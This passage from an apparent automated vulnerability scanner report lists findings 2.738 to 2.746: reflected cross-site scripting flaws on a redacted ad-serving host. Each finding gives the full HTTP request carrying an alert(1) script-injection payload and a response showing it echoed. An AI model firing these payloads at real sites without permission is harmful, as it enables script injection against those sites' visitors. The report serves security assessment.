The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bd6b"><script>alert(1)</script>46c5623722 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DEN/iview/249686747/direct/01/207115013?click=http://at.atwola.com/adlink/5113/796952/0/225/AdId=1144509;BnId=2;itime=207115013;kvpg=gnn%2F;kvmn=93301161;kvtid=16e8oqe01cg8de;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;nodecode=yes;link=&4bd6b"><script>alert(1)</script>46c5623722=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.gnn.com/_uac/adpage.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7943
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:26:56 GMT

<html><head><title>believe_728x90_AOL</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;" b
...[SNIP]...
at.atwola.com/adlink/5113/796952/0/225/AdId=1144509;BnId=2;itime=207115013;kvpg=gnn%2F;kvmn=93301161;kvtid=16e8oqe01cg8de;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;nodecode=yes;link=&4bd6b"><script>alert(1)</script>46c5623722=1\')(new Image).src=\'http://at.atwola.com/adlink/5113/796952/0/225/AdId=1144509;BnId=2;itime=207115013;kvpg=gnn%2F;kvmn=93301161;kvtid=16e8oqe01cg8de;kvseg=99999:50085:54057:60490:50212:50220:60183:5
...[SNIP]...

2.738. http://redcated/DEN/iview/249686747/direct/01/207115013 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /DEN/iview/249686747/direct/01/207115013

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e994b"-alert(1)-"aee1b70a34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DEN/iview/249686747/direct/01/207115013?click=http://at.atwola.com/adlink/5113/796952/0/225/AdId=1144509;BnId=2;itime=207115013;kvpg=gnn%2F;kvmn=93301161;kvtid=16e8oqe01cg8de;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;nodecode=yes;link=&e994b"-alert(1)-"aee1b70a34=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.gnn.com/_uac/adpage.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7868
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:26:57 GMT

<html><head><title>believe_728x90_AOL</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;" b
...[SNIP]...
at.atwola.com/adlink/5113/796952/0/225/AdId=1144509;BnId=2;itime=207115013;kvpg=gnn%2F;kvmn=93301161;kvtid=16e8oqe01cg8de;kvseg=99999:50085:54057:60490:50212:50220:60183:50216:50229;nodecode=yes;link=&e994b"-alert(1)-"aee1b70a34=1",
clickThruUrl: "http://clk.redcated/go/249686747/direct;ai.189689154;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click
...[SNIP]...

2.739. http://redcated/M0N/iview/266207224/direct [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /M0N/iview/266207224/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b7cf'%3b6ff802f1290 was submitted in the REST URL parameter 4. This input was echoed as 2b7cf';6ff802f1290 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /M0N/iview/266207224/direct2b7cf'%3b6ff802f1290;wi.160;hi.600/01?click= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://cdn.w55c.net/i/0RlmrHufJp_1887672428.html?rtbhost=174.36.140.30&btid=MTQyYWQwZmFkZjY2NGQ4NDQyZmI0NzBmMTkxYmM5OWY0MDFiYzVjN3xmMzhkOGFmMi1hYTcyLTQ4NGItOTY3OS01YTU4MzA2ZDBhMTh8MTI5MDM1MjE0MTQzNXwxfDBGb0NocHFIMlV8MFJsbXJIdWZKcHw1ODU4MDljNS0yOGM1LTQ4NDgtYTk5Yy03ZjRmOTIzN2YwNzc&ei=RUBICON&wp_exchange=13BB115E7425D128&euid=MDU2NThmMzEyMjJkNjQ2OWJhNDcxZWI4ZmQ5NGM1ZjZhODcyNjE0NQ&slotid=MQ&fiu=MEZvQ2hwcUgyVQ&ciu=MFJsbXJIdWZKcA&reqid=MTQyYWQwZmFkZjY2NGQ4NDQyZmI0NzBmMTkxYmM5OWY0MDFiYzVjNw&ccw=SUFCMjQjMC4w&epid=&bp=2196&dv=&dm=&os=&scres=&gen=&age=&zc=NzcwMDI&s=http%3A%2F%2Fadserver.adtechus.com%2Fadiframe%2F3.0%2F5235%2F1131606%2F0%2F154%2FADTECH%3Bcookie%3Dinfo%3Btarget%3D_blank%3Bkey%3Dkey1%2Bkey2%2Bkey3%2Bkey4%3Bgrp%3D000001&refurl=
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6413
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 15:09:30 GMT

<html><head><title>20100604_4G_EVO_Airplane_v2_160x600</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/0SM0NSPRTSSC/2010/20100604_4G_EVO_Airplane_v2_160x600.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/266207224/direct2b7cf';6ff802f1290;wi.160;hi.600;ai.186836865;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/266207224/direct2b7cf';6ff802f1290;wi.160;hi.600;ai.186836865;ct.1/01" />
...[SNIP]...

2.740. http://redcated/M0N/iview/266207224/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /M0N/iview/266207224/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f6e3"><script>alert(1)</script>0d0231daeae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /M0N/iview/266207224/direct;wi.160;hi.600/01?click=&5f6e3"><script>alert(1)</script>0d0231daeae=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://cdn.w55c.net/i/0RlmrHufJp_1887672428.html?rtbhost=174.36.140.30&btid=MTQyYWQwZmFkZjY2NGQ4NDQyZmI0NzBmMTkxYmM5OWY0MDFiYzVjN3xmMzhkOGFmMi1hYTcyLTQ4NGItOTY3OS01YTU4MzA2ZDBhMTh8MTI5MDM1MjE0MTQzNXwxfDBGb0NocHFIMlV8MFJsbXJIdWZKcHw1ODU4MDljNS0yOGM1LTQ4NDgtYTk5Yy03ZjRmOTIzN2YwNzc&ei=RUBICON&wp_exchange=13BB115E7425D128&euid=MDU2NThmMzEyMjJkNjQ2OWJhNDcxZWI4ZmQ5NGM1ZjZhODcyNjE0NQ&slotid=MQ&fiu=MEZvQ2hwcUgyVQ&ciu=MFJsbXJIdWZKcA&reqid=MTQyYWQwZmFkZjY2NGQ4NDQyZmI0NzBmMTkxYmM5OWY0MDFiYzVjNw&ccw=SUFCMjQjMC4w&epid=&bp=2196&dv=&dm=&os=&scres=&gen=&age=&zc=NzcwMDI&s=http%3A%2F%2Fadserver.adtechus.com%2Fadiframe%2F3.0%2F5235%2F1131606%2F0%2F154%2FADTECH%3Bcookie%3Dinfo%3Btarget%3D_blank%3Bkey%3Dkey1%2Bkey2%2Bkey3%2Bkey4%3Bgrp%3D000001&refurl=
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6463
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 15:09:21 GMT

<html><head><title>20100622_4G_EVO_Reaction_160x600</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/266207224/direct;wi.160;hi.600;ai.186836877;ct.1/01/" onclick="if(\'&5f6e3"><script>alert(1)</script>0d0231daeae=1\')(new Image).src=\'&5f6e3">
...[SNIP]...

2.741. http://redcated/M0N/iview/266207224/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /M0N/iview/266207224/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7559"-alert(1)-"26022d187f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /M0N/iview/266207224/direct;wi.160;hi.600/01?click=&a7559"-alert(1)-"26022d187f9=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://cdn.w55c.net/i/0RlmrHufJp_1887672428.html?rtbhost=174.36.140.30&btid=MTQyYWQwZmFkZjY2NGQ4NDQyZmI0NzBmMTkxYmM5OWY0MDFiYzVjN3xmMzhkOGFmMi1hYTcyLTQ4NGItOTY3OS01YTU4MzA2ZDBhMTh8MTI5MDM1MjE0MTQzNXwxfDBGb0NocHFIMlV8MFJsbXJIdWZKcHw1ODU4MDljNS0yOGM1LTQ4NDgtYTk5Yy03ZjRmOTIzN2YwNzc&ei=RUBICON&wp_exchange=13BB115E7425D128&euid=MDU2NThmMzEyMjJkNjQ2OWJhNDcxZWI4ZmQ5NGM1ZjZhODcyNjE0NQ&slotid=MQ&fiu=MEZvQ2hwcUgyVQ&ciu=MFJsbXJIdWZKcA&reqid=MTQyYWQwZmFkZjY2NGQ4NDQyZmI0NzBmMTkxYmM5OWY0MDFiYzVjNw&ccw=SUFCMjQjMC4w&epid=&bp=2196&dv=&dm=&os=&scres=&gen=&age=&zc=NzcwMDI&s=http%3A%2F%2Fadserver.adtechus.com%2Fadiframe%2F3.0%2F5235%2F1131606%2F0%2F154%2FADTECH%3Bcookie%3Dinfo%3Btarget%3D_blank%3Bkey%3Dkey1%2Bkey2%2Bkey3%2Bkey4%3Bgrp%3D000001&refurl=
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6401
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 15:09:22 GMT

<html><head><title>20100604_4G_EVO_Devices_v2_160x600</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0p
...[SNIP]...
if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginSSC1276549357747();
var _SSC1276549357747_Instance =
{
click : "&a7559"-alert(1)-"26022d187f9=1",
clickThruUrl: "http://clk.redcated/go/266207224/direct;wi.160;hi.600;ai.186836869;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique
...[SNIP]...

2.742. http://redcated/M0N/iview/266207224/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /M0N/iview/266207224/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e29c'-alert(1)-'6cf0556f105 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /M0N/iview/266207224/direct;wi.160;hi.600/01?click=&2e29c'-alert(1)-'6cf0556f105=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://cdn.w55c.net/i/0RlmrHufJp_1887672428.html?rtbhost=174.36.140.30&btid=MTQyYWQwZmFkZjY2NGQ4NDQyZmI0NzBmMTkxYmM5OWY0MDFiYzVjN3xmMzhkOGFmMi1hYTcyLTQ4NGItOTY3OS01YTU4MzA2ZDBhMTh8MTI5MDM1MjE0MTQzNXwxfDBGb0NocHFIMlV8MFJsbXJIdWZKcHw1ODU4MDljNS0yOGM1LTQ4NDgtYTk5Yy03ZjRmOTIzN2YwNzc&ei=RUBICON&wp_exchange=13BB115E7425D128&euid=MDU2NThmMzEyMjJkNjQ2OWJhNDcxZWI4ZmQ5NGM1ZjZhODcyNjE0NQ&slotid=MQ&fiu=MEZvQ2hwcUgyVQ&ciu=MFJsbXJIdWZKcA&reqid=MTQyYWQwZmFkZjY2NGQ4NDQyZmI0NzBmMTkxYmM5OWY0MDFiYzVjNw&ccw=SUFCMjQjMC4w&epid=&bp=2196&dv=&dm=&os=&scres=&gen=&age=&zc=NzcwMDI&s=http%3A%2F%2Fadserver.adtechus.com%2Fadiframe%2F3.0%2F5235%2F1131606%2F0%2F154%2FADTECH%3Bcookie%3Dinfo%3Btarget%3D_blank%3Bkey%3Dkey1%2Bkey2%2Bkey3%2Bkey4%3Bgrp%3D000001&refurl=
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6401
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 15:09:23 GMT

<html><head><title>20100604_4G_EVO_Devices_v2_160x600</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0p
...[SNIP]...

if ( "%OOB%" == "1" )
_strContentSSC1276549357747 = _strContentSSC1276549357747.replace(/!~!click!~!/g,'');
else
_strContentSSC1276549357747 = _strContentSSC1276549357747.replace(/!~!click!~!/g,'&2e29c'-alert(1)-'6cf0556f105=1');
}
else
{
_strContentSSC1276549357747 = '<a target="_blank" href="http://clk.atdmt.com/go/266207224/direct;wi.160;hi.600;ai.186836869;ct.1/01/" onclick="if(\'&2e29c'-alert(1)-'6cf0556f105=1
...[SNIP]...

2.743. http://redcated/M0N/iview/266207224/direct [wi.160;hi.600/01?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /M0N/iview/266207224/direct

Issue detail

The value of the wi.160;hi.600/01?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5b50'-alert(1)-'d2f5df69ea9 was submitted in the wi.160;hi.600/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /M0N/iview/266207224/direct;wi.160;hi.600/01?click=a5b50'-alert(1)-'d2f5df69ea9 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://cdn.w55c.net/i/0RlmrHufJp_1887672428.html?rtbhost=174.36.140.30&btid=MTQyYWQwZmFkZjY2NGQ4NDQyZmI0NzBmMTkxYmM5OWY0MDFiYzVjN3xmMzhkOGFmMi1hYTcyLTQ4NGItOTY3OS01YTU4MzA2ZDBhMTh8MTI5MDM1MjE0MTQzNXwxfDBGb0NocHFIMlV8MFJsbXJIdWZKcHw1ODU4MDljNS0yOGM1LTQ4NDgtYTk5Yy03ZjRmOTIzN2YwNzc&ei=RUBICON&wp_exchange=13BB115E7425D128&euid=MDU2NThmMzEyMjJkNjQ2OWJhNDcxZWI4ZmQ5NGM1ZjZhODcyNjE0NQ&slotid=MQ&fiu=MEZvQ2hwcUgyVQ&ciu=MFJsbXJIdWZKcA&reqid=MTQyYWQwZmFkZjY2NGQ4NDQyZmI0NzBmMTkxYmM5OWY0MDFiYzVjNw&ccw=SUFCMjQjMC4w&epid=&bp=2196&dv=&dm=&os=&scres=&gen=&age=&zc=NzcwMDI&s=http%3A%2F%2Fadserver.adtechus.com%2Fadiframe%2F3.0%2F5235%2F1131606%2F0%2F154%2FADTECH%3Bcookie%3Dinfo%3Btarget%3D_blank%3Bkey%3Dkey1%2Bkey2%2Bkey3%2Bkey4%3Bgrp%3D000001&refurl=
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6382
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 15:09:21 GMT

<html><head><title>20100604_4G_EVO_Devices_v2_160x600</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0p
...[SNIP]...
;
if ( "%OOB%" == "1" )
_strContentSSC1276549357747 = _strContentSSC1276549357747.replace(/!~!click!~!/g,'');
else
_strContentSSC1276549357747 = _strContentSSC1276549357747.replace(/!~!click!~!/g,'a5b50'-alert(1)-'d2f5df69ea9');
}
else
{
_strContentSSC1276549357747 = '<a target="_blank" href="http://clk.atdmt.com/go/266207224/direct;wi.160;hi.600;ai.186836869;ct.1/01/" onclick="if(\'a5b50'-alert(1)-'d2f5df69ea9\')(n
...[SNIP]...

2.744. http://redcated/M0N/iview/266207224/direct [wi.160;hi.600/01?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /M0N/iview/266207224/direct

Issue detail

The value of the wi.160;hi.600/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2aa4</script><script>alert(1)</script>90cb208319 was submitted in the wi.160;hi.600/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /M0N/iview/266207224/direct;wi.160;hi.600/01?click=b2aa4</script><script>alert(1)</script>90cb208319 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://cdn.w55c.net/i/0RlmrHufJp_1887672428.html?rtbhost=174.36.140.30&btid=MTQyYWQwZmFkZjY2NGQ4NDQyZmI0NzBmMTkxYmM5OWY0MDFiYzVjN3xmMzhkOGFmMi1hYTcyLTQ4NGItOTY3OS01YTU4MzA2ZDBhMTh8MTI5MDM1MjE0MTQzNXwxfDBGb0NocHFIMlV8MFJsbXJIdWZKcHw1ODU4MDljNS0yOGM1LTQ4NDgtYTk5Yy03ZjRmOTIzN2YwNzc&ei=RUBICON&wp_exchange=13BB115E7425D128&euid=MDU2NThmMzEyMjJkNjQ2OWJhNDcxZWI4ZmQ5NGM1ZjZhODcyNjE0NQ&slotid=MQ&fiu=MEZvQ2hwcUgyVQ&ciu=MFJsbXJIdWZKcA&reqid=MTQyYWQwZmFkZjY2NGQ4NDQyZmI0NzBmMTkxYmM5OWY0MDFiYzVjNw&ccw=SUFCMjQjMC4w&epid=&bp=2196&dv=&dm=&os=&scres=&gen=&age=&zc=NzcwMDI&s=http%3A%2F%2Fadserver.adtechus.com%2Fadiframe%2F3.0%2F5235%2F1131606%2F0%2F154%2FADTECH%3Bcookie%3Dinfo%3Btarget%3D_blank%3Bkey%3Dkey1%2Bkey2%2Bkey3%2Bkey4%3Bgrp%3D000001&refurl=
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6477
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 15:09:19 GMT

<html><head><title>20100622_4G_EVO_Reaction_160x600</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;
...[SNIP]...
e if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginSSC1277406561780();
var _SSC1277406561780_Instance =
{
click : "b2aa4</script><script>alert(1)</script>90cb208319",
clickThruUrl: "http://clk.redcated/go/266207224/direct;wi.160;hi.600;ai.186836877;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_i
...[SNIP]...

2.745. http://redcated/NYC/iview/194153896/direct [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /NYC/iview/194153896/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f95a'%3b5b5ec4c441f was submitted in the REST URL parameter 4. This input was echoed as 5f95a';5b5ec4c441f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NYC/iview/194153896/direct5f95a'%3b5b5ec4c441f;wi.120;hi.600/01/3642846207?click=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000875061/cstr=70969515=_4ce92459,3642846207,708689^875061^1^0,1_/xsxdata=$XSXDATA/bnum=70969515/optn=64?trg= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430; ach00=692f/1c58a; ach01=b6a6dbb/1c58a/10be2bc4/692f/4ce705e5

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7224
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 21 Nov 2010 14:10:07 GMT

<html>
<head>
<title>20101008_SH_MC_CBBB_120x600_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-w
...[SNIP]...
<param name="movie" value="HTTP://ec.atdmt.com/ds/AANYCSTRWSTW/Sheraton_2010/20101008_SH_MC_CBBB_120x600.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/194153896/direct5f95a';5b5ec4c441f;wi.120;hi.600;ai.186068554;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/194153896/direct5f95a';5b5ec4c441f;wi.120;hi.600;ai.186068554;ct.1/01" />
...[SNIP]...

2.746. http://redcated/NYC/iview/194153896/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/194153896/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 958cd"><script>alert(1)</script>ae5fe3e4008 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NYC/iview/194153896/direct;wi.120;hi.600/01/3642846207?click=http://r1.ace.advertising.com/click/site=0000708689/mnum=0000875061/cstr=70969515=_4ce92459,3642846207,708689^875061^1^0,1_/xsxdata=$XSXDATA/bnum=70969515/optn=64?trg=&958cd"><script>alert(1)</script>ae5fe3e4008=1 HTTP/1.1
